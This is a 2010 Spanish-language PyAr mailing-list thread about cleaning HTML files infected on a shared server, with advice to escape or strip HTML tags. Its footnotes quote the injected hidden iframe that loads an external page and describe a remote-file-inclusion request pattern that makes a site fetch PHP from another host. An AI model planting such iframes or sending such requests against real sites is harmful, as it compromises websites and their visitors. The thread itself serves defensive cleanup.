[pyar] script genérico para actualizar archivos html

Misael Zapata misaelzapata en gmail.com
Lun Jul 12 16:45:59 ART 2010


2010/7/12 Pablo Ziliani <pablo en kultroom.com>

> Misael Zapata wrote:
>
>> No sabía si postearlo en el wiki o en pastebin, si lo creen útil, ponganlo
>> ahí:
>>
>> http://pastebin.com/fwsa5Jq9  [0]
>>
>> ese código no sirve para los nuevos "virus" que son como 20 lineas de
>> código javascript encriptado, y que es un quilombo de quitar con el código
>> bash que pongo arriba.
>>
>> [0] el primero de los códigos lo usaba de alerta, cuando mandaban 5 a 10
>> ataques por hora, corrido en cron, los otros son variantes muy básicas
>>
>
> Creo que estás equivocado desde el vamos. No tenés que borrar los tags que
> puedan ser parte de un ataque. El tipo de ataque va a variar
> indefectiblemente, y vos vas a seguir estando vulnerable. Tenés que borrar
> (o escapar) TODOS los tags, eventualmente exceptuando aquellos que vos
> *realmente* sepas que son inofensivos (normalmente con los de formateo de
> texto alcanza y sobra: <strong><em> y <br>).
>

Creo que no me expliqué bien. El "virus" se metió por algún script de algún
sitio, en un shared server y contaminó todo de todo. Yo solo busco limpiar
los archivos que este script maldito infectó [0]  antes que google banee los
sitios. En otro servidor que manejo, con algo de soft lo controlo, no he
tenido infecciones, pero en este shared me cansaron.


>
> Si realmente necesitás darle al usuario la posibilidad de que inserte HTML
> libre, entonces vas a necesitar algo mucho más complejo, te recomendaría que
> directamente implementes ReStructured Text, Textile o Markdown (buscá
> docutils). Si no, fijate por acá:
>

Como te decía arriba, el "virus" no entra por ningún sitio u script mio,
tengo todo los GET y POST bien controlados, he visto como hace [1] y se que
no infectó desde mi código, pero se propagó en todos los sitios del shared.


>
> escapando html:
>   http://wiki.python.org/moin/EscapingHtml
>
> borrando html:
>
> http://love-python.blogspot.com/2008/07/strip-html-tags-using-python.html
>
>
El segundo link está muy bueno, bien simple, gracias!


> _______________________________________________
> pyar mailing list pyar en python.org.ar
> http://listas.python.org.ar/listinfo/pyar
>
> PyAr - Python Argentina - Sitio web: http://www.python.org.ar/
>

[0] agrega un script en el footer de la página, un js desde una página
externa, como esto:
<iframe src="http://url.com/lib/index.php" width=0 height=0 style="hidden"
frameborder=0 marginheight=0 marginwidth=0 scrolling=no>
[1] el ataque es simple index.php?variable=
http://sitioinfectado.com/algo.txt - algo.php , y lo tira un bot que revisa
la salida que se genera. Si está mal programado el sitio, se imprime
usualmente una linea de texto, ya que el archivo contiene php estilo <?php
echo 'algo';?>
------------ próxima parte ------------
Se ha borrado un adjunto en formato HTML...
URL: <http://listas.python.org.ar/pipermail/pyar/attachments/20100712/ed8bb545/attachment.html>


More information about the pyar mailing list